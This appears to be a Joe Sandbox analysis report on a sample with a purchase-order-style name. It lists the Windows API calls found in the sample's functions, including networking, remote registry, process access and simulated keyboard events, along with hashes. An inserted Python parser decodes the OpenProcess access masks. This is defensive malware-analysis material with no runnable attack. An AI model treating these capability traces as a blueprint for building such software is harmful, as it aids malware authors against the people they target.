• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: Value$CurrentThread__decode_pointer$ErrorExitImageLastNonwritable___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
• String ID:
• API String ID: 1925773019-0
• Opcode ID: 78c5a7e04feddb60afef3bdf2204f5ea6d2fca564e255d6fa6df859771c1ea47
• Instruction ID: d0499dd1a11a7aa3f5f6b81cdb2be0183561266298d4129ec5ef95b8f2f1ff50
• Opcode Fuzzy Hash: 78c5a7e04feddb60afef3bdf2204f5ea6d2fca564e255d6fa6df859771c1ea47
• Instruction Fuzzy Hash: 12018430000200ABC704BFB2DD0D9DE7BA9AF95345722886EF90497212DA3CC9C28B5C
APIs
• VariantClear.OLEAUT32(00000038), ref: 004357C3
• VariantClear.OLEAUT32(00000058), ref: 004357C9
• VariantClear.OLEAUT32(00000068), ref: 004357CF
• VariantClear.OLEAUT32(00000078), ref: 004357D5
• VariantClear.OLEAUT32(00000088), ref: 004357DE
• VariantClear.OLEAUT32(00000048), ref: 004357E4
• VariantClear.OLEAUT32(00000098), ref: 004357ED
• VariantClear.OLEAUT32(000000A8), ref: 004357F6
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: ClearVariant
• String ID:
• API String ID: 1473721057-0
• Opcode ID: 108e33c2045b04221b4df3f02cd388125a51a7e0134505e60bdc817f2fb2f336
• Instruction ID: 4669651a97e20320d925a323ac357da1b1419afffb7c9eb93274aad60c959a81
• Opcode Fuzzy Hash: 108e33c2045b04221b4df3f02cd388125a51a7e0134505e60bdc817f2fb2f336
• Instruction Fuzzy Hash: BDF03CB6400B446AC235EB79DC40BD7B7E86F89200F018E1DE58783514DA78F588CB64
APIs
• WSAStartup.WSOCK32(00000101,?), ref: 00464ADE
  • Part of subcall function 0045EFE7: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,0047D14B,?,?,?,?), ref: 0045F003
• inet_addr.WSOCK32(?), ref: 00464B1F
• gethostbyname.WSOCK32(?), ref: 00464B29
• _memset.LIBCMT ref: 00464B92
• GlobalAlloc.KERNEL32(00000040,00000040), ref: 00464B9E
• GlobalFree.KERNEL32(00000000), ref: 00464CDE
• WSACleanup.WSOCK32 ref: 00464CE4
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memsetgethostbynameinet_addr
• String ID:
• API String ID: 3424476444-0
• Opcode ID: 3a9821fb802cba04523fcb9c1f83c74fd5b22343f7d4654d6e4056c4a41f6a01
                                                                                                                                                                                                                                                                                                            • Instruction ID: 8d90feaebe95447676150adcea4a136074f650e12d33839f26a9dde16614cdb7
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3a9821fb802cba04523fcb9c1f83c74fd5b22343f7d4654d6e4056c4a41f6a01
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A3A17EB1504300AFD710EF65C982F9BB7E8AFC8714F54491EF64497381E778E9058B9A
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(0000000F), ref: 00440B7B
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: MetricsSystem
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 4116985748-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: eff4c90f3403bcfb76001cffaab33834930133fcb34fa8184a7caea4de8066d9
                                                                                                                                                                                                                                                                                                            • Instruction ID: 1e23dbab6d9439f1299be2c39bdf7de0481ead398f869a6d5eaf0ea33fa99bdf
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: eff4c90f3403bcfb76001cffaab33834930133fcb34fa8184a7caea4de8066d9
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8EA19C70608701DBE314CF68C984B6BBBE1FB88704F14491EFA8593251E778F965CB5A
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                                                                                                                                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046AC62
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: ConnectRegistry_wcslen
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 535477410-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 37987dacba266e2f7d681c7555595b89ca1c624194ad33880a6965c3691367fb
                                                                                                                                                                                                                                                                                                            • Instruction ID: 71109d01e6e71572d3d886d5d9f1e4ab699fb1be984f768d753da2f0a00da466
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 37987dacba266e2f7d681c7555595b89ca1c624194ad33880a6965c3691367fb
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BBA18EB1204300AFC710EF65C885B1BB7E4BF85704F14896EF685AB292D779E905CB9B
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                                                                                                                                                                                                                                                            • _memset.LIBCMT ref: 004538C4
                                                                                                                                                                                                                                                                                                            • GetMenuItemInfoW.USER32(?,?), ref: 004538EF
                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00453960
                                                                                                                                                                                                                                                                                                            • SetMenuItemInfoW.USER32(00000011,?,00000000,?), ref: 004539C4
                                                                                                                                                                                                                                                                                                            • SetMenuDefaultItem.USER32(?,000000FF,00000000,?,?), ref: 004539E0
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: ItemMenu$Info_wcslen$Default_memset_wcscpy
                                                                                                                                                                                                                                                                                                            • String ID: 0
                                                                                                                                                                                                                                                                                                            • API String ID: 3530711334-4108050209
                                                                                                                                                                                                                                                                                                            • Opcode ID: 95001eb6d8d06d897afce0aca893f4b7651020868193ca3a80220c39ecb6f9c3
                                                                                                                                                                                                                                                                                                            • Instruction ID: 97d09e0af2b4d046480d7fb626e7fa0667c22e7462995616ff61acde959b3bac
• Opcode Fuzzy Hash: 95001eb6d8d06d897afce0aca893f4b7651020868193ca3a80220c39ecb6f9c3
• Instruction Fuzzy Hash: 747118F15083015AD714DF65C881B6BB7E4EB98396F04491FFD8082292D7BCDA4CC7AA
APIs
• GetCurrentProcessId.KERNEL32(?), ref: 00473A00
• OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00473A0E
• GetProcessIoCounters.KERNEL32(00000000,?), ref: 00473A34
• CloseHandle.KERNEL32(00000000,00000000,?,00000028), ref: 00473C01
Strings
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: Process$CloseCountersCurrentHandleOpen
• String ID: HH
• API String ID: 3488606520-2761332787
• Opcode ID: 12402d889b8d2545f97f81e579d11a3e1d05628ef8a47b4e2ac7d1c45517ac81
• Instruction ID: 2161edc7e7eefe464b48455ffcea7dd3157e2cbe85e131cccd8837112284b0a3
• Opcode Fuzzy Hash: 12402d889b8d2545f97f81e579d11a3e1d05628ef8a47b4e2ac7d1c45517ac81
• Instruction Fuzzy Hash: 3581BF71A043019FD320EF69C882B5BF7E4AF84744F108C2EF598AB392D675E945CB96
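The record above lists the function's imports as Joe Sandbox resolved them, with the arguments it could recover and the call-site address. The following Python is an added example, not part of the Joe Sandbox report or of its tooling: it parses API lines written in the shape shown on this page (bullet, `Name.MODULE(args), ref: address`, optionally prefixed with `Part of subcall function XXXXXXXX:`) and decodes the desired-access mask passed to `OpenProcess`. The sample record is constructed from the lines above (plus one subcall line copied from the next record); the access-right values are the documented Windows `PROCESS_*` constants, and the line grammar is assumed from this page's layout only.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample, copied in the shape the report uses on this page.
SAMPLE_RECORD = """\
• GetCurrentProcessId.KERNEL32(?), ref: 00473A00
• OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00473A0E
• GetProcessIoCounters.KERNEL32(00000000,?), ref: 00473A34
• CloseHandle.KERNEL32(00000000,00000000,?,00000028), ref: 00473C01
  • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
"""

# Grammar assumed from this page's layout: "?" marks an argument the
# sandbox could not resolve; addresses are 8 hex digits.
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

# Documented Windows process access rights (winnt.h).
PROCESS_ACCESS = {
    0x0001: "PROCESS_TERMINATE",
    0x0002: "PROCESS_CREATE_THREAD",
    0x0008: "PROCESS_VM_OPERATION",
    0x0010: "PROCESS_VM_READ",
    0x0020: "PROCESS_VM_WRITE",
    0x0040: "PROCESS_DUP_HANDLE",
    0x0080: "PROCESS_CREATE_PROCESS",
    0x0100: "PROCESS_SET_QUOTA",
    0x0200: "PROCESS_SET_INFORMATION",
    0x0400: "PROCESS_QUERY_INFORMATION",
    0x0800: "PROCESS_SUSPEND_RESUME",
    0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
}


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[Optional[int]]   # None where the report shows "?"
    ref: int                    # call-site address
    subcall_of: Optional[int]   # address of the callee when line is "Part of subcall"


def _parse_arg(tok: str) -> Optional[int]:
    tok = tok.strip()
    return None if tok == "?" else int(tok, 16)


def parse_record(text: str) -> List[ApiCall]:
    """Parse every API line of one function record; other lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        raw = m["args"].strip()
        args = [_parse_arg(a) for a in raw.split(",")] if raw else []
        sub = int(m["sub"], 16) if m["sub"] else None
        calls.append(ApiCall(m["name"], m["module"], args, int(m["ref"], 16), sub))
    return calls


def decode_process_access(mask: int) -> List[str]:
    """Expand an OpenProcess dwDesiredAccess mask into named rights."""
    names = [n for bit, n in PROCESS_ACCESS.items() if mask & bit]
    rest = mask & ~sum(PROCESS_ACCESS)
    if rest:
        names.append(f"0x{rest:X}")  # bits outside the table, e.g. generic rights
    return names


def open_process_rights(calls: List[ApiCall]):
    """(call site, raw mask, decoded rights) for every resolved OpenProcess call."""
    return [(c.ref, c.args[0], decode_process_access(c.args[0]))
            for c in calls
            if c.name == "OpenProcess" and c.args and c.args[0] is not None]


if __name__ == "__main__":
    for ref, mask, rights in open_process_rights(parse_record(SAMPLE_RECORD)):
        print(f"OpenProcess at {ref:08X}: 0x{mask:X} = {' | '.join(rights)}")
```

For the record above this yields `0x410 = PROCESS_VM_READ | PROCESS_QUERY_INFORMATION`, which, together with the preceding `GetCurrentProcessId` and the following `GetProcessIoCounters`, is consistent with the function opening a handle to its own process and reading its I/O counters; the report itself does not state what the counters are used for, so no further purpose should be read into it from these lines alone.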
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                                                                                                                                                                                                                                                            • Ellipse.GDI32(?,?,?,00000000), ref: 00447463
                                                                                                                                                                                                                                                                                                            • MoveToEx.GDI32(?,?,?,00000000), ref: 00447473
                                                                                                                                                                                                                                                                                                            • AngleArc.GDI32(?,?,?,?,?,?), ref: 004474B6
                                                                                                                                                                                                                                                                                                            • LineTo.GDI32(?,?), ref: 004474BF
                                                                                                                                                                                                                                                                                                            • CloseFigure.GDI32(?), ref: 004474C6
                                                                                                                                                                                                                                                                                                            • SetPixel.GDI32(?,?,?,?), ref: 004474D6
                                                                                                                                                                                                                                                                                                            • Rectangle.GDI32(?,?), ref: 004474F3
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 4082120231-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 3e823f4574af11f26be8c20bd8771cfecf2a7ea1363ae8038588c787c8c49515
                                                                                                                                                                                                                                                                                                            • Instruction ID: e2e17d079c8faeb919f1a119f9aa9df975eabc7d00289576b12f70c1741c819b
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3e823f4574af11f26be8c20bd8771cfecf2a7ea1363ae8038588c787c8c49515
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BC713AB11083419FD300DF15C884E6BBBE9EFC9708F148A1EF99497351D778A906CBAA
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                                                                                                                                                                                                                                                            • Ellipse.GDI32(?,?,?,00000000), ref: 00447463
                                                                                                                                                                                                                                                                                                            • MoveToEx.GDI32(?,?,?,00000000), ref: 00447473
                                                                                                                                                                                                                                                                                                            • AngleArc.GDI32(?,?,?,?,?,?), ref: 004474B6
                                                                                                                                                                                                                                                                                                            • LineTo.GDI32(?,?), ref: 004474BF
                                                                                                                                                                                                                                                                                                            • CloseFigure.GDI32(?), ref: 004474C6
                                                                                                                                                                                                                                                                                                            • SetPixel.GDI32(?,?,?,?), ref: 004474D6
                                                                                                                                                                                                                                                                                                            • Rectangle.GDI32(?,?), ref: 004474F3
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 4082120231-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: AngleCloseEllipseFigureLineMovePixelRectangle
• String ID:
• API String ID: 288456094-0
APIs
• GetParent.USER32(?), ref: 004449B0
• GetKeyboardState.USER32(?), ref: 004449C3
• SetKeyboardState.USER32(?), ref: 00444A0F
• PostMessageW.USER32(?,00000101,00000010,?), ref: 00444A3F
• PostMessageW.USER32(?,00000101,00000011,?), ref: 00444A60
• PostMessageW.USER32(?,00000101,00000012,?), ref: 00444AAC
• PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444AD1
Similarity
• API ID: MessagePost$KeyboardState$Parent
• String ID:
• API String ID: 87235514-0
APIs
• GetParent.USER32(?), ref: 00444BA9
• GetKeyboardState.USER32(?), ref: 00444BBC
• SetKeyboardState.USER32(?), ref: 00444C08
• PostMessageW.USER32(?,00000100,00000010,?), ref: 00444C35
• PostMessageW.USER32(?,00000100,00000011,?), ref: 00444C53
• PostMessageW.USER32(?,00000100,00000012,?), ref: 00444C9C
• PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444CBE
Similarity
• API ID: MessagePost$KeyboardState$Parent
• String ID:
• API String ID: 87235514-0
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
